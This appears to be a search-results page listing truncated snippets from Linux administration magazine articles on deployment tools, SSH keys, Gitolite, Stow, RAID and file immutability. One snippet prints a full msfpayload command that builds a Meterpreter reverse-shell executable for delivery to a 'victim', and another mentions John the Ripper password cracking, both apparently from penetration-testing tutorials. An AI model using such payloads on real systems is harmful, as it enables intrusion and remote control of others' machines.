16%
31.10.2025
, followed by an installation guide using a virtual instance of Ubuntu 12.04 as an example. Then, I'll demonstrate the main administration tool. Following this, the root filesystem on a test system
16%
30.11.2025
, and root. It sends the current user's public key to the remote host and adds it to the ~/.ssh/authorized_keys file for both remote users. It also changes the SSH configuration for the remote root user
16%
31.10.2025
01 user "root";
02
03 Desc "Apache installation";
04 task "apacheinstall", sub {
05
06 install package => "apache2";
07 service "apache2" => "start";
08
09 };
10
11 Desc "Upload and sync
16%
30.11.2025
to download the software from GitHub:
git clone git://github.com/sitaramc/gitolite
Still working as root, run the install script, which installs the Gitolite programs globally:
# gitolite
16%
30.11.2025
the following command:
# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.245.134 LPORT=4444 X /root/Desktop/evi1.exe
All that's left now is to deliver the executable to the victim, which requires some
16%
26.03.2025
the package zsh
with the zshrc file, you would call Stow as follows to generate a symbolic link in your home directory:
stow --target $HOME --dir $HOME/dotfiles/ zsh
The results are now:
ls ~/.zshrc
/root
16%
30.11.2025
the redirection options, and you need to create a root folder manually – that is, a central share that all users are allowed to access. Windows then automatically creates subfolders for the individual users
16%
30.11.2025
Openwall's website.
John the Ripper is a command-line utility that does not require administrative or root privileges to run against a password hash file. However, you will need administrative privileges
16%
31.10.2025
option:
Figure 2: The initial situation: a hard disk with a root and a swap partition.
raider -R1
You don't need to state the disks/partitions here
16%
28.07.2025
with the +i (immutable) attribute (line 37), preventing even root from modifying or deleting it without explicitly unsetting this flag. Meanwhile, systemd is configured to monitor the file. If a change